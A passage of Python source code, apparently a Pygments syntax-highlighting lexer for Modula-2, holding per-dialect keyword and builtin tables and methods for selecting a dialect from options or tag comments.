'DESTROY', 'EMPTY', 'ISMEMBER', 'SELF',\n )\n\n # ISO Modula-2 Additional Pseudo-Module Builtins Dataset\n iso_additional_pseudo_builtins = (\n # 14 additional builtins (SYSTEM)\n 'SYSTEM', 'BITSPERLOC', 'LOCSPERBYTE', 'LOCSPERWORD', 'LOC',\n 'ADDADR', 'SUBADR', 'DIFADR', 'MAKEADR', 'ADR',\n 'ROTATE', 'SHIFT', 'CAST', 'TSIZE',\n # 13 additional builtins (COROUTINES)\n 'COROUTINES', 'ATTACH', 'COROUTINE', 'CURRENT', 'DETACH', 'HANDLER',\n 'INTERRUPTSOURCE', 'IOTRANSFER', 'IsATTACHED', 'LISTEN',\n 'NEWCOROUTINE', 'PROT', 'TRANSFER',\n # 9 additional builtins (EXCEPTIONS)\n 'EXCEPTIONS', 'AllocateSource', 'CurrentNumber', 'ExceptionNumber',\n 'ExceptionSource', 'GetMessage', 'IsCurrentSource',\n 'IsExceptionalExecution', 'RAISE',\n # 3 additional builtins (TERMINATION)\n 'TERMINATION', 'IsTerminating', 'HasHalted',\n # 4 additional builtins (M2EXCEPTION)\n 'M2EXCEPTION', 'M2Exceptions', 'M2Exception', 'IsM2Exception',\n 'indexException', 'rangeException', 'caseSelectException',\n 'invalidLocation', 'functionException', 'wholeValueException',\n 'wholeDivException', 'realValueException', 'realDivException',\n 'complexValueException', 'complexDivException', 'protException',\n 'sysException', 'coException', 'exException',\n )\n\n# M o d u l a - 2 R 1 0 D a t a s e t s\n\n # Lexemes to Mark as Error Tokens for Modula-2 R10\n m2r10_lexemes_to_reject = (\n '!', '`', '@', '$', '%', '&', '<>',\n )\n\n # Modula-2 R10 reserved words in addition to the common set\n m2r10_additional_reserved_words = (\n # 12 additional reserved words\n 'ALIAS', 'ARGLIST', 'BLUEPRINT', 'COPY', 'GENLIB', 'INDETERMINATE',\n 'NEW', 'NONE', 'OPAQUE', 'REFERENTIAL', 'RELEASE', 'RETAIN',\n # 2 additional reserved words with symbolic assembly option\n 'ASM', 'REG',\n )\n\n # Modula-2 R10 builtins in addition to the common set\n m2r10_additional_builtins = (\n # 26 additional builtins\n 'CARDINAL', 'COUNT', 'EMPTY', 'EXISTS', 'INSERT', 'LENGTH', 'LONGCARD',\n 'OCTET', 'PTR', 'PRED', 'READ', 'READNEW', 'REMOVE', 'RETRIEVE', 'SORT',\n 'STORE', 'SUBSET', 'SUCC', 'TLIMIT', 'TMAX', 'TMIN', 'TRUE', 'TSIZE',\n 'UNICHAR', 'WRITE', 'WRITEF',\n )\n\n # Modula-2 R10 Additional Pseudo-Module Builtins Dataset\n m2r10_additional_pseudo_builtins = (\n # 13 additional builtins (TPROPERTIES)\n 'TPROPERTIES', 'PROPERTY', 'LITERAL', 'TPROPERTY', 'TLITERAL',\n 'TBUILTIN', 'TDYN', 'TREFC', 'TNIL', 'TBASE', 'TPRECISION',\n 'TMAXEXP', 'TMINEXP',\n # 4 additional builtins (CONVERSION)\n 'CONVERSION', 'TSXFSIZE', 'SXF', 'VAL',\n # 35 additional builtins (UNSAFE)\n 'UNSAFE', 'CAST', 'INTRINSIC', 'AVAIL', 'ADD', 'SUB', 'ADDC', 'SUBC',\n 'FETCHADD', 'FETCHSUB', 'SHL', 'SHR', 'ASHR', 'ROTL', 'ROTR', 'ROTLC',\n 'ROTRC', 'BWNOT', 'BWAND', 'BWOR', 'BWXOR', 'BWNAND', 'BWNOR',\n 'SETBIT', 'TESTBIT', 'LSBIT', 'MSBIT', 'CSBITS', 'BAIL', 'HALT',\n 'TODO', 'FFI', 'ADDR', 'VARGLIST', 'VARGC',\n # 11 additional builtins (ATOMIC)\n 'ATOMIC', 'INTRINSIC', 'AVAIL', 'SWAP', 'CAS', 'INC', 'DEC', 'BWAND',\n 'BWNAND', 'BWOR', 'BWXOR',\n # 7 additional builtins (COMPILER)\n 'COMPILER', 'DEBUG', 'MODNAME', 'PROCNAME', 'LINENUM', 'DEFAULT',\n 'HASH',\n # 5 additional builtins (ASSEMBLER)\n 'ASSEMBLER', 'REGISTER', 'SETREG', 'GETREG', 'CODE',\n )\n\n# O b j e c t i v e M o d u l a - 2 D a t a s e t s\n\n # Lexemes to Mark as Error Tokens for Objective Modula-2\n objm2_lexemes_to_reject = (\n '!', '$', '%', '&', '<>',\n )\n\n # Objective Modula-2 Extensions\n # reserved words in addition to Modula-2 R10\n objm2_additional_reserved_words = (\n # 16 additional reserved words\n 'BYCOPY', 'BYREF', 'CLASS', 'CONTINUE', 'CRITICAL', 'INOUT', 'METHOD',\n 'ON', 'OPTIONAL', 'OUT', 'PRIVATE', 'PROTECTED', 'PROTOCOL', 'PUBLIC',\n 'SUPER', 'TRY',\n )\n\n # Objective Modula-2 Extensions\n # builtins in addition to Modula-2 R10\n objm2_additional_builtins = (\n # 3 additional builtins\n 'OBJECT', 'NO', 'YES',\n )\n\n # Objective Modula-2 Extensions\n # pseudo-module builtins in addition to Modula-2 R10\n objm2_additional_pseudo_builtins = (\n # None\n )\n\n# A g l e t M o d u l a - 2 D a t a s e t s\n\n # Aglet Extensions\n # reserved words in addition to ISO Modula-2\n aglet_additional_reserved_words = (\n # None\n )\n\n # Aglet Extensions\n # builtins in addition to ISO Modula-2\n aglet_additional_builtins = (\n # 9 additional builtins\n 'BITSET8', 'BITSET16', 'BITSET32', 'CARDINAL8', 'CARDINAL16',\n 'CARDINAL32', 'INTEGER8', 'INTEGER16', 'INTEGER32',\n )\n\n # Aglet Modula-2 Extensions\n # pseudo-module builtins in addition to ISO Modula-2\n aglet_additional_pseudo_builtins = (\n # None\n )\n\n# G N U M o d u l a - 2 D a t a s e t s\n\n # GNU Extensions\n # reserved words in addition to PIM Modula-2\n gm2_additional_reserved_words = (\n # 10 additional reserved words\n 'ASM', '__ATTRIBUTE__', '__BUILTIN__', '__COLUMN__', '__DATE__',\n '__FILE__', '__FUNCTION__', '__LINE__', '__MODULE__', 'VOLATILE',\n )\n\n # GNU Extensions\n # builtins in addition to PIM Modula-2\n gm2_additional_builtins = (\n # 21 additional builtins\n 'BITSET8', 'BITSET16', 'BITSET32', 'CARDINAL8', 'CARDINAL16',\n 'CARDINAL32', 'CARDINAL64', 'COMPLEX32', 'COMPLEX64', 'COMPLEX96',\n 'COMPLEX128', 'INTEGER8', 'INTEGER16', 'INTEGER32', 'INTEGER64',\n 'REAL8', 'REAL16', 'REAL32', 'REAL96', 'REAL128', 'THROW',\n )\n\n # GNU Extensions\n # pseudo-module builtins in addition to PIM Modula-2\n gm2_additional_pseudo_builtins = (\n # None\n )\n\n# p 1 M o d u l a - 2 D a t a s e t s\n\n # p1 Extensions\n # reserved words in addition to ISO Modula-2\n p1_additional_reserved_words = (\n # None\n )\n\n # p1 Extensions\n # builtins in addition to ISO Modula-2\n p1_additional_builtins = (\n # None\n )\n\n # p1 Modula-2 Extensions\n # pseudo-module builtins in addition to ISO Modula-2\n p1_additional_pseudo_builtins = (\n # 1 additional builtin\n 'BCD',\n )\n\n# X D S M o d u l a - 2 D a t a s e t s\n\n # XDS Extensions\n # reserved words in addition to ISO Modula-2\n xds_additional_reserved_words = (\n # 1 additional reserved word\n 'SEQ',\n )\n\n # XDS Extensions\n # builtins in addition to ISO Modula-2\n xds_additional_builtins = (\n # 9 additional builtins\n 'ASH', 'ASSERT', 'DIFFADR_TYPE', 'ENTIER', 'INDEX', 'LEN',\n 'LONGCARD', 'SHORTCARD', 'SHORTINT',\n )\n\n # XDS Modula-2 Extensions\n # pseudo-module builtins in addition to ISO Modula-2\n xds_additional_pseudo_builtins = (\n # 22 additional builtins (SYSTEM)\n 'PROCESS', 'NEWPROCESS', 'BOOL8', 'BOOL16', 'BOOL32', 'CARD8',\n 'CARD16', 'CARD32', 'INT8', 'INT16', 'INT32', 'REF', 'MOVE',\n 'FILL', 'GET', 'PUT', 'CC', 'int', 'unsigned', 'size_t', 'void'\n # 3 additional builtins (COMPILER)\n 'COMPILER', 'OPTION', 'EQUATION'\n )\n\n# P I M S t a n d a r d L i b r a r y D a t a s e t s\n\n # PIM Modula-2 Standard Library Modules Dataset\n pim_stdlib_module_identifiers = (\n 'Terminal', 'FileSystem', 'InOut', 'RealInOut', 'MathLib0', 'Storage',\n )\n\n # PIM Modula-2 Standard Library Types Dataset\n pim_stdlib_type_identifiers = (\n 'Flag', 'FlagSet', 'Response', 'Command', 'Lock', 'Permission',\n 'MediumType', 'File', 'FileProc', 'DirectoryProc', 'FileCommand',\n 'DirectoryCommand',\n )\n\n # PIM Modula-2 Standard Library Procedures Dataset\n pim_stdlib_proc_identifiers = (\n 'Read', 'BusyRead', 'ReadAgain', 'Write', 'WriteString', 'WriteLn',\n 'Create', 'Lookup', 'Close', 'Delete', 'Rename', 'SetRead', 'SetWrite',\n 'SetModify', 'SetOpen', 'Doio', 'SetPos', 'GetPos', 'Length', 'Reset',\n 'Again', 'ReadWord', 'WriteWord', 'ReadChar', 'WriteChar',\n 'CreateMedium', 'DeleteMedium', 'AssignName', 'DeassignName',\n 'ReadMedium', 'LookupMedium', 'OpenInput', 'OpenOutput', 'CloseInput',\n 'CloseOutput', 'ReadString', 'ReadInt', 'ReadCard', 'ReadWrd',\n 'WriteInt', 'WriteCard', 'WriteOct', 'WriteHex', 'WriteWrd',\n 'ReadReal', 'WriteReal', 'WriteFixPt', 'WriteRealOct', 'sqrt', 'exp',\n 'ln', 'sin', 'cos', 'arctan', 'entier', 'ALLOCATE', 'DEALLOCATE',\n )\n\n # PIM Modula-2 Standard Library Variables Dataset\n pim_stdlib_var_identifiers = (\n 'Done', 'termCH', 'in', 'out'\n )\n\n # PIM Modula-2 Standard Library Constants Dataset\n pim_stdlib_const_identifiers = (\n 'EOL',\n )\n\n# I S O S t a n d a r d L i b r a r y D a t a s e t s\n\n # ISO Modula-2 Standard Library Modules Dataset\n iso_stdlib_module_identifiers = (\n # TO DO\n )\n\n # ISO Modula-2 Standard Library Types Dataset\n iso_stdlib_type_identifiers = (\n # TO DO\n )\n\n # ISO Modula-2 Standard Library Procedures Dataset\n iso_stdlib_proc_identifiers = (\n # TO DO\n )\n\n # ISO Modula-2 Standard Library Variables Dataset\n iso_stdlib_var_identifiers = (\n # TO DO\n )\n\n # ISO Modula-2 Standard Library Constants Dataset\n iso_stdlib_const_identifiers = (\n # TO DO\n )\n\n# M 2 R 1 0 S t a n d a r d L i b r a r y D a t a s e t s\n\n # Modula-2 R10 Standard Library ADTs Dataset\n m2r10_stdlib_adt_identifiers = (\n 'BCD', 'LONGBCD', 'BITSET', 'SHORTBITSET', 'LONGBITSET',\n 'LONGLONGBITSET', 'COMPLEX', 'LONGCOMPLEX', 'SHORTCARD', 'LONGLONGCARD',\n 'SHORTINT', 'LONGLONGINT', 'POSINT', 'SHORTPOSINT', 'LONGPOSINT',\n 'LONGLONGPOSINT', 'BITSET8', 'BITSET16', 'BITSET32', 'BITSET64',\n 'BITSET128', 'BS8', 'BS16', 'BS32', 'BS64', 'BS128', 'CARDINAL8',\n 'CARDINAL16', 'CARDINAL32', 'CARDINAL64', 'CARDINAL128', 'CARD8',\n 'CARD16', 'CARD32', 'CARD64', 'CARD128', 'INTEGER8', 'INTEGER16',\n 'INTEGER32', 'INTEGER64', 'INTEGER128', 'INT8', 'INT16', 'INT32',\n 'INT64', 'INT128', 'STRING', 'UNISTRING',\n )\n\n # Modula-2 R10 Standard Library Blueprints Dataset\n m2r10_stdlib_blueprint_identifiers = (\n 'ProtoRoot', 'ProtoComputational', 'ProtoNumeric', 'ProtoScalar',\n 'ProtoNonScalar', 'ProtoCardinal', 'ProtoInteger', 'ProtoReal',\n 'ProtoComplex', 'ProtoVector', 'ProtoTuple', 'ProtoCompArray',\n 'ProtoCollection', 'ProtoStaticArray', 'ProtoStaticSet',\n 'ProtoStaticString', 'ProtoArray', 'ProtoString', 'ProtoSet',\n 'ProtoMultiSet', 'ProtoDictionary', 'ProtoMultiDict', 'ProtoExtension',\n 'ProtoIO', 'ProtoCardMath', 'ProtoIntMath', 'ProtoRealMath',\n )\n\n # Modula-2 R10 Standard Library Modules Dataset\n m2r10_stdlib_module_identifiers = (\n 'ASCII', 'BooleanIO', 'CharIO', 'UnicharIO', 'OctetIO',\n 'CardinalIO', 'LongCardIO', 'IntegerIO', 'LongIntIO', 'RealIO',\n 'LongRealIO', 'BCDIO', 'LongBCDIO', 'CardMath', 'LongCardMath',\n 'IntMath', 'LongIntMath', 'RealMath', 'LongRealMath', 'BCDMath',\n 'LongBCDMath', 'FileIO', 'FileSystem', 'Storage', 'IOSupport',\n )\n\n # Modula-2 R10 Standard Library Types Dataset\n m2r10_stdlib_type_identifiers = (\n 'File', 'Status',\n # TO BE COMPLETED\n )\n\n # Modula-2 R10 Standard Library Procedures Dataset\n m2r10_stdlib_proc_identifiers = (\n 'ALLOCATE', 'DEALLOCATE', 'SIZE',\n # TO BE COMPLETED\n )\n\n # Modula-2 R10 Standard Library Variables Dataset\n m2r10_stdlib_var_identifiers = (\n 'stdIn', 'stdOut', 'stdErr',\n )\n\n # Modula-2 R10 Standard Library Constants Dataset\n m2r10_stdlib_const_identifiers = (\n 'pi', 'tau',\n )\n\n# D i a l e c t s\n\n # Dialect modes\n dialects = (\n 'unknown',\n 'm2pim', 'm2iso', 'm2r10', 'objm2',\n 'm2iso+aglet', 'm2pim+gm2', 'm2iso+p1', 'm2iso+xds',\n )\n\n# D a t a b a s e s\n\n # Lexemes to Mark as Errors Database\n lexemes_to_reject_db = {\n # Lexemes to reject for unknown dialect\n 'unknown': (\n # LEAVE THIS EMPTY\n ),\n # Lexemes to reject for PIM Modula-2\n 'm2pim': (\n pim_lexemes_to_reject,\n ),\n # Lexemes to reject for ISO Modula-2\n 'm2iso': (\n iso_lexemes_to_reject,\n ),\n # Lexemes to reject for Modula-2 R10\n 'm2r10': (\n m2r10_lexemes_to_reject,\n ),\n # Lexemes to reject for Objective Modula-2\n 'objm2': (\n objm2_lexemes_to_reject,\n ),\n # Lexemes to reject for Aglet Modula-2\n 'm2iso+aglet': (\n iso_lexemes_to_reject,\n ),\n # Lexemes to reject for GNU Modula-2\n 'm2pim+gm2': (\n pim_lexemes_to_reject,\n ),\n # Lexemes to reject for p1 Modula-2\n 'm2iso+p1': (\n iso_lexemes_to_reject,\n ),\n # Lexemes to reject for XDS Modula-2\n 'm2iso+xds': (\n iso_lexemes_to_reject,\n ),\n }\n\n # Reserved Words Database\n reserved_words_db = {\n # Reserved words for unknown dialect\n 'unknown': (\n common_reserved_words,\n pim_additional_reserved_words,\n iso_additional_reserved_words,\n m2r10_additional_reserved_words,\n ),\n\n # Reserved words for PIM Modula-2\n 'm2pim': (\n common_reserved_words,\n pim_additional_reserved_words,\n ),\n\n # Reserved words for Modula-2 R10\n 'm2iso': (\n common_reserved_words,\n iso_additional_reserved_words,\n ),\n\n # Reserved words for ISO Modula-2\n 'm2r10': (\n common_reserved_words,\n m2r10_additional_reserved_words,\n ),\n\n # Reserved words for Objective Modula-2\n 'objm2': (\n common_reserved_words,\n m2r10_additional_reserved_words,\n objm2_additional_reserved_words,\n ),\n\n # Reserved words for Aglet Modula-2 Extensions\n 'm2iso+aglet': (\n common_reserved_words,\n iso_additional_reserved_words,\n aglet_additional_reserved_words,\n ),\n\n # Reserved words for GNU Modula-2 Extensions\n 'm2pim+gm2': (\n common_reserved_words,\n pim_additional_reserved_words,\n gm2_additional_reserved_words,\n ),\n\n # Reserved words for p1 Modula-2 Extensions\n 'm2iso+p1': (\n common_reserved_words,\n iso_additional_reserved_words,\n p1_additional_reserved_words,\n ),\n\n # Reserved words for XDS Modula-2 Extensions\n 'm2iso+xds': (\n common_reserved_words,\n iso_additional_reserved_words,\n xds_additional_reserved_words,\n ),\n }\n\n # Builtins Database\n builtins_db = {\n # Builtins for unknown dialect\n 'unknown': (\n common_builtins,\n pim_additional_builtins,\n iso_additional_builtins,\n m2r10_additional_builtins,\n ),\n\n # Builtins for PIM Modula-2\n 'm2pim': (\n common_builtins,\n pim_additional_builtins,\n ),\n\n # Builtins for ISO Modula-2\n 'm2iso': (\n common_builtins,\n iso_additional_builtins,\n ),\n\n # Builtins for ISO Modula-2\n 'm2r10': (\n common_builtins,\n m2r10_additional_builtins,\n ),\n\n # Builtins for Objective Modula-2\n 'objm2': (\n common_builtins,\n m2r10_additional_builtins,\n objm2_additional_builtins,\n ),\n\n # Builtins for Aglet Modula-2 Extensions\n 'm2iso+aglet': (\n common_builtins,\n iso_additional_builtins,\n aglet_additional_builtins,\n ),\n\n # Builtins for GNU Modula-2 Extensions\n 'm2pim+gm2': (\n common_builtins,\n pim_additional_builtins,\n gm2_additional_builtins,\n ),\n\n # Builtins for p1 Modula-2 Extensions\n 'm2iso+p1': (\n common_builtins,\n iso_additional_builtins,\n p1_additional_builtins,\n ),\n\n # Builtins for XDS Modula-2 Extensions\n 'm2iso+xds': (\n common_builtins,\n iso_additional_builtins,\n xds_additional_builtins,\n ),\n }\n\n # Pseudo-Module Builtins Database\n pseudo_builtins_db = {\n # Builtins for unknown dialect\n 'unknown': (\n common_pseudo_builtins,\n pim_additional_pseudo_builtins,\n iso_additional_pseudo_builtins,\n m2r10_additional_pseudo_builtins,\n ),\n\n # Builtins for PIM Modula-2\n 'm2pim': (\n common_pseudo_builtins,\n pim_additional_pseudo_builtins,\n ),\n\n # Builtins for ISO Modula-2\n 'm2iso': (\n common_pseudo_builtins,\n iso_additional_pseudo_builtins,\n ),\n\n # Builtins for ISO Modula-2\n 'm2r10': (\n common_pseudo_builtins,\n m2r10_additional_pseudo_builtins,\n ),\n\n # Builtins for Objective Modula-2\n 'objm2': (\n common_pseudo_builtins,\n m2r10_additional_pseudo_builtins,\n objm2_additional_pseudo_builtins,\n ),\n\n # Builtins for Aglet Modula-2 Extensions\n 'm2iso+aglet': (\n common_pseudo_builtins,\n iso_additional_pseudo_builtins,\n aglet_additional_pseudo_builtins,\n ),\n\n # Builtins for GNU Modula-2 Extensions\n 'm2pim+gm2': (\n common_pseudo_builtins,\n pim_additional_pseudo_builtins,\n gm2_additional_pseudo_builtins,\n ),\n\n # Builtins for p1 Modula-2 Extensions\n 'm2iso+p1': (\n common_pseudo_builtins,\n iso_additional_pseudo_builtins,\n p1_additional_pseudo_builtins,\n ),\n\n # Builtins for XDS Modula-2 Extensions\n 'm2iso+xds': (\n common_pseudo_builtins,\n iso_additional_pseudo_builtins,\n xds_additional_pseudo_builtins,\n ),\n }\n\n # Standard Library ADTs Database\n stdlib_adts_db = {\n # Empty entry for unknown dialect\n 'unknown': (\n # LEAVE THIS EMPTY\n ),\n # Standard Library ADTs for PIM Modula-2\n 'm2pim': (\n # No first class library types\n ),\n\n # Standard Library ADTs for ISO Modula-2\n 'm2iso': (\n # No first class library types\n ),\n\n # Standard Library ADTs for Modula-2 R10\n 'm2r10': (\n m2r10_stdlib_adt_identifiers,\n ),\n\n # Standard Library ADTs for Objective Modula-2\n 'objm2': (\n m2r10_stdlib_adt_identifiers,\n ),\n\n # Standard Library ADTs for Aglet Modula-2\n 'm2iso+aglet': (\n # No first class library types\n ),\n\n # Standard Library ADTs for GNU Modula-2\n 'm2pim+gm2': (\n # No first class library types\n ),\n\n # Standard Library ADTs for p1 Modula-2\n 'm2iso+p1': (\n # No first class library types\n ),\n\n # Standard Library ADTs for XDS Modula-2\n 'm2iso+xds': (\n # No first class library types\n ),\n }\n\n # Standard Library Modules Database\n stdlib_modules_db = {\n # Empty entry for unknown dialect\n 'unknown': (\n # LEAVE THIS EMPTY\n ),\n # Standard Library Modules for PIM Modula-2\n 'm2pim': (\n pim_stdlib_module_identifiers,\n ),\n\n # Standard Library Modules for ISO Modula-2\n 'm2iso': (\n iso_stdlib_module_identifiers,\n ),\n\n # Standard Library Modules for Modula-2 R10\n 'm2r10': (\n m2r10_stdlib_blueprint_identifiers,\n m2r10_stdlib_module_identifiers,\n m2r10_stdlib_adt_identifiers,\n ),\n\n # Standard Library Modules for Objective Modula-2\n 'objm2': (\n m2r10_stdlib_blueprint_identifiers,\n m2r10_stdlib_module_identifiers,\n ),\n\n # Standard Library Modules for Aglet Modula-2\n 'm2iso+aglet': (\n iso_stdlib_module_identifiers,\n ),\n\n # Standard Library Modules for GNU Modula-2\n 'm2pim+gm2': (\n pim_stdlib_module_identifiers,\n ),\n\n # Standard Library Modules for p1 Modula-2\n 'm2iso+p1': (\n iso_stdlib_module_identifiers,\n ),\n\n # Standard Library Modules for XDS Modula-2\n 'm2iso+xds': (\n iso_stdlib_module_identifiers,\n ),\n }\n\n # Standard Library Types Database\n stdlib_types_db = {\n # Empty entry for unknown dialect\n 'unknown': (\n # LEAVE THIS EMPTY\n ),\n # Standard Library Types for PIM Modula-2\n 'm2pim': (\n pim_stdlib_type_identifiers,\n ),\n\n # Standard Library Types for ISO Modula-2\n 'm2iso': (\n iso_stdlib_type_identifiers,\n ),\n\n # Standard Library Types for Modula-2 R10\n 'm2r10': (\n m2r10_stdlib_type_identifiers,\n ),\n\n # Standard Library Types for Objective Modula-2\n 'objm2': (\n m2r10_stdlib_type_identifiers,\n ),\n\n # Standard Library Types for Aglet Modula-2\n 'm2iso+aglet': (\n iso_stdlib_type_identifiers,\n ),\n\n # Standard Library Types for GNU Modula-2\n 'm2pim+gm2': (\n pim_stdlib_type_identifiers,\n ),\n\n # Standard Library Types for p1 Modula-2\n 'm2iso+p1': (\n iso_stdlib_type_identifiers,\n ),\n\n # Standard Library Types for XDS Modula-2\n 'm2iso+xds': (\n iso_stdlib_type_identifiers,\n ),\n }\n\n # Standard Library Procedures Database\n stdlib_procedures_db = {\n # Empty entry for unknown dialect\n 'unknown': (\n # LEAVE THIS EMPTY\n ),\n # Standard Library Procedures for PIM Modula-2\n 'm2pim': (\n pim_stdlib_proc_identifiers,\n ),\n\n # Standard Library Procedures for ISO Modula-2\n 'm2iso': (\n iso_stdlib_proc_identifiers,\n ),\n\n # Standard Library Procedures for Modula-2 R10\n 'm2r10': (\n m2r10_stdlib_proc_identifiers,\n ),\n\n # Standard Library Procedures for Objective Modula-2\n 'objm2': (\n m2r10_stdlib_proc_identifiers,\n ),\n\n # Standard Library Procedures for Aglet Modula-2\n 'm2iso+aglet': (\n iso_stdlib_proc_identifiers,\n ),\n\n # Standard Library Procedures for GNU Modula-2\n 'm2pim+gm2': (\n pim_stdlib_proc_identifiers,\n ),\n\n # Standard Library Procedures for p1 Modula-2\n 'm2iso+p1': (\n iso_stdlib_proc_identifiers,\n ),\n\n # Standard Library Procedures for XDS Modula-2\n 'm2iso+xds': (\n iso_stdlib_proc_identifiers,\n ),\n }\n\n # Standard Library Variables Database\n stdlib_variables_db = {\n # Empty entry for unknown dialect\n 'unknown': (\n # LEAVE THIS EMPTY\n ),\n # Standard Library Variables for PIM Modula-2\n 'm2pim': (\n pim_stdlib_var_identifiers,\n ),\n\n # Standard Library Variables for ISO Modula-2\n 'm2iso': (\n iso_stdlib_var_identifiers,\n ),\n\n # Standard Library Variables for Modula-2 R10\n 'm2r10': (\n m2r10_stdlib_var_identifiers,\n ),\n\n # Standard Library Variables for Objective Modula-2\n 'objm2': (\n m2r10_stdlib_var_identifiers,\n ),\n\n # Standard Library Variables for Aglet Modula-2\n 'm2iso+aglet': (\n iso_stdlib_var_identifiers,\n ),\n\n # Standard Library Variables for GNU Modula-2\n 'm2pim+gm2': (\n pim_stdlib_var_identifiers,\n ),\n\n # Standard Library Variables for p1 Modula-2\n 'm2iso+p1': (\n iso_stdlib_var_identifiers,\n ),\n\n # Standard Library Variables for XDS Modula-2\n 'm2iso+xds': (\n iso_stdlib_var_identifiers,\n ),\n }\n\n # Standard Library Constants Database\n stdlib_constants_db = {\n # Empty entry for unknown dialect\n 'unknown': (\n # LEAVE THIS EMPTY\n ),\n # Standard Library Constants for PIM Modula-2\n 'm2pim': (\n pim_stdlib_const_identifiers,\n ),\n\n # Standard Library Constants for ISO Modula-2\n 'm2iso': (\n iso_stdlib_const_identifiers,\n ),\n\n # Standard Library Constants for Modula-2 R10\n 'm2r10': (\n m2r10_stdlib_const_identifiers,\n ),\n\n # Standard Library Constants for Objective Modula-2\n 'objm2': (\n m2r10_stdlib_const_identifiers,\n ),\n\n # Standard Library Constants for Aglet Modula-2\n 'm2iso+aglet': (\n iso_stdlib_const_identifiers,\n ),\n\n # Standard Library Constants for GNU Modula-2\n 'm2pim+gm2': (\n pim_stdlib_const_identifiers,\n ),\n\n # Standard Library Constants for p1 Modula-2\n 'm2iso+p1': (\n iso_stdlib_const_identifiers,\n ),\n\n # Standard Library Constants for XDS Modula-2\n 'm2iso+xds': (\n iso_stdlib_const_identifiers,\n ),\n }\n\n# M e t h o d s\n\n # initialise a lexer instance\n def __init__(self, **options):\n #\n # check dialect options\n #\n dialects = get_list_opt(options, 'dialect', [])\n #\n for dialect_option in dialects:\n if dialect_option in self.dialects[1:-1]:\n # valid dialect option found\n self.set_dialect(dialect_option)\n break\n #\n # Fallback Mode (DEFAULT)\n else:\n # no valid dialect option\n self.set_dialect('unknown')\n #\n self.dialect_set_by_tag = False\n #\n # check style options\n #\n styles = get_list_opt(options, 'style', [])\n #\n # use lowercase mode for Algol style\n if 'algol' in styles or 'algol_nu' in styles:\n self.algol_publication_mode = True\n else:\n self.algol_publication_mode = False\n #\n # Check option flags\n #\n self.treat_stdlib_adts_as_builtins = get_bool_opt(\n options, 'treat_stdlib_adts_as_builtins', True)\n #\n # call superclass initialiser\n RegexLexer.__init__(self, **options)\n\n # Set lexer to a specified dialect\n def set_dialect(self, dialect_id):\n #\n # if __debug__:\n # print 'entered set_dialect with arg: ', dialect_id\n #\n # check dialect name against known dialects\n if dialect_id not in self.dialects:\n dialect = 'unknown' # default\n else:\n dialect = dialect_id\n #\n # compose lexemes to reject set\n lexemes_to_reject_set = set()\n # add each list of reject lexemes for this dialect\n for list in self.lexemes_to_reject_db[dialect]:\n lexemes_to_reject_set.update(set(list))\n #\n # compose reserved words set\n reswords_set = set()\n # add each list of reserved words for this dialect\n for list in self.reserved_words_db[dialect]:\n reswords_set.update(set(list))\n #\n # compose builtins set\n builtins_set = set()\n # add each list of builtins for this dialect excluding reserved words\n for list in self.builtins_db[dialect]:\n builtins_set.update(set(list).difference(reswords_set))\n #\n # compose pseudo-builtins set\n pseudo_builtins_set = set()\n # add each list of builtins for this dialect excluding reserved words\n for list in self.pseudo_builtins_db[dialect]:\n pseudo_builtins_set.update(set(list).difference(reswords_set))\n #\n # compose ADTs set\n adts_set = set()\n # add each list of ADTs for this dialect excluding reserved words\n for list in self.stdlib_adts_db[dialect]:\n adts_set.update(set(list).difference(reswords_set))\n #\n # compose modules set\n modules_set = set()\n # add each list of builtins for this dialect excluding builtins\n for list in self.stdlib_modules_db[dialect]:\n modules_set.update(set(list).difference(builtins_set))\n #\n # compose types set\n types_set = set()\n # add each list of types for this dialect excluding builtins\n for list in self.stdlib_types_db[dialect]:\n types_set.update(set(list).difference(builtins_set))\n #\n # compose procedures set\n procedures_set = set()\n # add each list of procedures for this dialect excluding builtins\n for list in self.stdlib_procedures_db[dialect]:\n procedures_set.update(set(list).difference(builtins_set))\n #\n # compose variables set\n variables_set = set()\n # add each list of variables for this dialect excluding builtins\n for list in self.stdlib_variables_db[dialect]:\n variables_set.update(set(list).difference(builtins_set))\n #\n # compose constants set\n constants_set = set()\n # add each list of constants for this dialect excluding builtins\n for list in self.stdlib_constants_db[dialect]:\n constants_set.update(set(list).difference(builtins_set))\n #\n # update lexer state\n self.dialect = dialect\n self.lexemes_to_reject = lexemes_to_reject_set\n self.reserved_words = reswords_set\n self.builtins = builtins_set\n self.pseudo_builtins = pseudo_builtins_set\n self.adts = adts_set\n self.modules = modules_set\n self.types = types_set\n self.procedures = procedures_set\n self.variables = variables_set\n self.constants = constants_set\n #\n # if __debug__:\n # print 'exiting set_dialect'\n # print ' self.dialect: ', self.dialect\n # print ' self.lexemes_to_reject: ', self.lexemes_to_reject\n # print ' self.reserved_words: ', self.reserved_words\n # print ' self.builtins: ', self.builtins\n # print ' self.pseudo_builtins: ', self.pseudo_builtins\n # print ' self.adts: ', self.adts\n # print ' self.modules: ', self.modules\n # print ' self.types: ', self.types\n # print ' self.procedures: ', self.procedures\n # print ' self.variables: ', self.variables\n # print ' self.types: ', self.types\n # print ' self.constants: ', self.constants\n\n # Extracts a dialect name from a dialect tag comment string and checks\n # the extracted name against known dialects. If a match is found, the\n # matching name is returned, otherwise dialect id 'unknown' is returned\n def get_dialect_from_dialect_tag(self, dialect_tag):\n #\n # if __debug__:\n # print 'entered get_dialect_from_dialect_tag with arg: ', dialect_tag\n #\n # constants\n left_tag_delim = '(*!'\n right_tag_delim = '*)'\n left_tag_delim_len = len(left_tag_delim)\n right_tag_delim_len = len(right_tag_delim)\n indicator_start = left_tag_delim_len\n indicator_end = -(right_tag_delim_len)\n #\n # check comment string for dialect indicator\n if len(dialect_tag) > (left_tag_delim_len + right_tag_delim_len) \\\n and dialect_tag.startswith(left_tag_delim) \\\n and dialect_tag.endswith(right_tag_delim):\n #\n # if __debug__:\n # print 'dialect tag found'\n #\n # extract dialect indicator\n indicator = dialect_tag[indicator_start:indicator_end]\n #\n # if __debug__:\n # print 'extracted: ', indicator\n #\n # check against known dialects\n for index in range(1, len(self.dialects)):\n #\n # if __debug__:\n # print 'dialects[', index, ']: ', self.dialects[index]\n #\n if indicator == self.dialects[index]:\n #\n # if __debug__:\n # print 'matching dialect found'\n #\n # indicator matches known dialect\n return indicator\n else:\n # indicator does not match any dialect\n return 'unknown' # default\n else:\n # invalid indicator string\n return 'unknown' # default\n\n # intercept the token stream, modify token attributes and return them\n def get_tokens_unprocessed(self, text):\n for index, token, value in RegexLexer.get_tokens_unprocessed(self, text):\n #\n # check for dialect tag if dialect has not been set by tag\n if not self.dialect_set_by_tag and token == 